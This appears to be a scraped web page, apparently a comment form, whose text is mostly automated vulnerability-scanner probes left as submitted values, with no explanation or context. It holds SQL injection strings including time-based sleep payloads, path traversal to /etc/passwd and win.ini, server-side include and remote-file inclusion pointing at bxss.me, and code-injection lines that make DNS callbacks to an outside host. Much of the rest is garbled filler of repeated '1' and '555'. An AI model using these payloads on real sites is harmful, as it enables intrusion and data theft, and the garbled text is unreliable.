Miskolcz-Revital TSE @ 1  
Miskolcz-Revital TSE @ 1  
Miskolcz-Revital TSE @ -1 OR 2+837-837-1=0+0+0+1 --  
Miskolcz-Revital TSE @ -1 OR 3+837-837-1=0+0+0+1 --  
Miskolcz-Revital TSE @ -1 OR 2+530-530-1=0+0+0+1  
Miskolcz-Revital TSE @ -1 OR 3+530-530-1=0+0+0+1  
Miskolcz-Revital TSE @ -1 OR 3*2<(0+5+530-530)  
Miskolcz-Revital TSE @ -1 OR 3*2>(0+5+530-530)  
Miskolcz-Revital TSE @ 1  
Miskolcz-Revital TSE @ 1  
Miskolcz-Revital TSE @ -1" OR 2+331-331-1=0+0+0+1 --  
Miskolcz-Revital TSE @ -1" OR 3+331-331-1=0+0+0+1 --  
Miskolcz-Revital TSE @ -1" OR 3*2<(0+5+331-331) --  
Miskolcz-Revital TSE @ -1" OR 3*2>(0+5+331-331) --  
Miskolcz-Revital TSE @ if(now()=sysdate(),sleep(15),0)  
Miskolcz-Revital TSE @ 0  
Miskolcz-Revital TSE @ 0  
Miskolcz-Revital TSE @ 0  
Miskolcz-Revital TSE @ 0  
Miskolcz-Revital TSE @ 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z  
Miskolcz-Revital TSE @ 0  
Miskolcz-Revital TSE @ 0  
Miskolcz-Revital TSE @ 0  
Miskolcz-Revital TSE @ 0  
Miskolcz-Revital TSE @ 0  
Miskolcz-Revital TSE @ 0  
- 2022/10/06 - Brúnó
 


1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1GDhMsL4O

555
 
 
1

555
 
 
1

1Zoa8ZrtO
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
95Mea0GQ

555
 
 
1

555
 
 
1

555
 
 
1

O7bAe38k
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
response.write(9133567*9473389)

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
"+response.write(9133567*9473389)+"

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

response.write(9385847*9043499)
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

"+response.write(9385847*9043499)+"
 
 
1<esi:include src="http://bxss.me/rpb.png"/>

555
 
 
1

555
 
 
${10000499+9999770}

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

"+response.write(9385847*9043499)+"
 
 
1<esi:include src="http://bxss.me/rpb.png"/>

555
 
 
1

555
 
 
${10000499+9999770}

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

${9999367+10000191}
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 


555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 


555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1&n918600=v942425

555
 
 


555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555&n963990=v981022
 
 
1

555
 
 
1

555
 
 
1

 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
../../../../../../../../../../../../../../etc/passwd

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 


555
 
 
../../../../../../../../../../../../../../windows/win.ini

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

 
 
../1

555
 
 
1

555
 
 
)

555
 
 
1

555
 
 
1

555
 
 
./1

555
 
 
1

555
 
 
!(()&&!|*|*|

555
 
 
1

555
 
 
1

555
 
 
1

../../../../../../../../../../../../../../etc/passwd
 
 
1

555
 
 
^(#$!@#$)(()))******

555
 
 
1

555
 
 
1

../../../../../../../../../../../../../../windows/win.ini
 
 
1

555
 
 
1

)
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

!(()&&!|*|*|
 
 
1

555
 
 
1

../555
 
 
1

555
 
 
1

^(#$!@#$)(()))******
 
 
".gethostbyname(lc("hitij"."bhgqilxyc6ffb.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(78).chr(103

555
 
 
1

555
 
 
1

./555
 
 
1

555
 
 
1

555
 
 
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

555
 
 
1

".gethostbyname(lc("hitdm"."nvewbrgpf9679.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(76).chr(117).chr(86)."
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1some_inexistent_file_with_long_name.jpg

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
Http://bxss.me/t/fit.txt

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
http://bxss.me/t/fit.txt?.jpg

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
bxss.me

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

1some_inexistent_file_with_long_name.jpg
 
 
1

555
 
 
1

555
 
 
1

Http://bxss.me/t/fit.txt
 
 
1

555
 
 
1

555
 
 
1

http://bxss.me/t/fit.txt?.jpg
 
 
HttP://bxss.me/t/xss.html?%00

555
 
 
1

555
 
 
"+"A".concat(70-3).concat(22*4).concat(117).concat(89).concat(120).concat(83)+(require"socket" Socket.gethostbyname("hit

555
 
 
1

555
 
 
1

bxss.me
 
 
bxss.me/t/xss.html?%00

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
1

HttP://bxss.me/t/xss.html?%00
 
 
1

"+"A".concat(70-3).concat(22*4).concat(121).concat(73).concat(119).concat(87)+(require"socket"
Socket.gethostbyname("hitqa"+"zvtfpojid1a6e.bxss.me.")[3].to_s)+"
 
 
1

555
 
 
1

555
 
 
1

bxss.me/t/xss.html?%00
 
 
1

555
 
 
1

555
 
 
1

555
 
 
admin.php

555
 
 
1

555
 
 
1

555
 
 
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555
 
 
1

555
 
 
admin.php

555
 
 
1

555
 
 
1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 
 
admin.php/.

555
 
 
1

555
 
 
1

555
 
 
1

555
 
 
/xfs.bxss.me

555
 
 
1

admin.php
 
 
1

555
 
 
1

555
 
 
1

/xfs.bxss.me
 
 
1

admin.php
 
 
1

555
 
 
1

555
 
 
1

936515
 
 
1

admin.php/.
 
 
1

555
 
 
1

http://xfs.bxss.me
 
 
";print(md5(31337));$a="

555
 
 
1

555
 
 
1

//xfs.bxss.me
 
 
${@print(md5(31337))}

555
 
 
1

555
 
 
<!--

555
 
 
1

/xfs.bxss.me
 
 
1

555
 
 
1